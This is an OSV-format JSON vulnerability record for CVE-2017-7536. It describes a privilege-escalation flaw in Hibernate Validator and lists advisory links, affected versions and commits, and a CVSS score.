{"id":"CVE-2017-7536","details":"In Hibernate Validator 5.2.x before 5.2.5 final, 5.3.x, and 5.4.x, it was found that when the security manager's reflective permissions, which allows it to access the private members of the class, are granted to Hibernate Validator, a potential privilege escalation can occur. By allowing the calling code to access those private members without the permission an attacker may be able to validate an invalid instance and access the private member value via ConstraintViolation#getInvalidValue().","aliases":["GHSA-xxgp-pcfc-3vgc"],"modified":"2026-04-10T04:00:56.733487Z","published":"2018-01-10T15:29:00.283Z","references":[{"type":"WEB","url":"https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2018:2741"},{"type":"ADVISORY","url":"http://www.securitytracker.com/id/1039744"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2017:2808"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2017:2810"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2017:3141"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2017:3458"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2018:2740"},{"type":"ADVISORY","url":"http://www.securityfocus.com/bid/101048"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2017:2811"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2017:3454"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2018:2742"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2017:2809"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2017:3456"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2018:2927"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2017:3455"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2018:2743"},{"type":"ADVISORY","url":"https://access.redhat.com/errata/RHSA-2018:3817"},{"type":"REPORT","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1465573"}],"affected":[{"ranges":[{"type":"GIT","repo":"https://github.com/hibernate/hibernate-validator","events":[{"introduced":"a93f900f0f91bdfccf98a1825d7cfbd85b8a6c85"},{"fixed":"9a8ee4954d9d6596f0bd87fd66d51deac81724d1"},{"introduced":"a3fa9cee819a8e85ab99e8106c434e175b9d5a3b"},{"fixed":"be5f102e7c9eba64e58b93763befde4284ce9e67"},{"introduced":"b9b5ee347e9231271029561ac8cddab00519e484"},{"fixed":"134a5bddddc15559cc8557ef6c91e8d6d7ff3d08"},{"introduced":"0"},{"last_affected":"d805da5686ba8083a858939595347da922c11a8b"},{"introduced":"0"},{"last_affected":"7642f2628e411bb0e414ad50ed6d4461d6d0715d"},{"introduced":"0"},{"last_affected":"9f35cfaffe42bbf442040172538b54f90be817d8"},{"introduced":"0"},{"last_affected":"9f35cfaffe42bbf442040172538b54f90be817d8"}],"database_specific":{"versions":[{"introduced":"5.2.0"},{"fixed":"5.2.5"},{"introduced":"5.3.0"},{"fixed":"5.3.6"},{"introduced":"5.4.0"},{"fixed":"5.4.2"},{"introduced":"0"},{"last_affected":"6.0.0"},{"introduced":"0"},{"last_affected":"7.0"},{"introduced":"0"},{"last_affected":"4.0"},{"introduced":"0"},{"last_affected":"4.0"}]}}],"versions":["4.0.0.GA","5.2.0.Final","5.2.1.Final","5.2.2.Final","5.2.3.Final","5.2.4.Final","5.3.0.Alpha1","5.3.0.Final","5.3.1.Final","5.3.2.Final","5.3.3.Final","5.3.4.Final","5.3.5.Final","5.4.0.Final","5.4.1.Final","6.0.0.Alpha1","6.0.0.Alpha2","6.0.0.Beta1","6.0.0.Beta2","6.0.0.CR1","6.0.0.CR2","6.0.0.CR3","6.0.0.Final","6.0.1.Final","6.0.2.Final","6.0.3.Final","6.0.4.Final","6.0.5.Final","6.0.6.Final","6.0.7.Final","6.0.8.Final","6.0.9.Final","6.1.0.Alpha1","6.1.0.Alpha2","6.1.0.Alpha3","6.1.0.Alpha4","6.1.0.Alpha5","6.1.0.Alpha6","6.1.0.Final","6.1.1.Final","6.1.2.Final","7.0.0.Alpha1","7.0.0.Alpha2","7.0.0.Alpha3","7.0.0.Alpha4","7.0.0.Alpha5","7.0.0.Alpha6","7.0.0.CR1","7.0.0.Final"],"database_specific":{"unresolved_ranges":[{"events":[{"introduced":"0"},{"last_affected":"6.4"}]},{"events":[{"introduced":"0"},{"last_affected":"6.4"}]},{"events":[{"introduced":"0"},{"last_affected":"6.4.0"}]},{"events":[{"introduced":"0"},{"last_affected":"7.1"}]}],"source":"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2017-7536.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}]}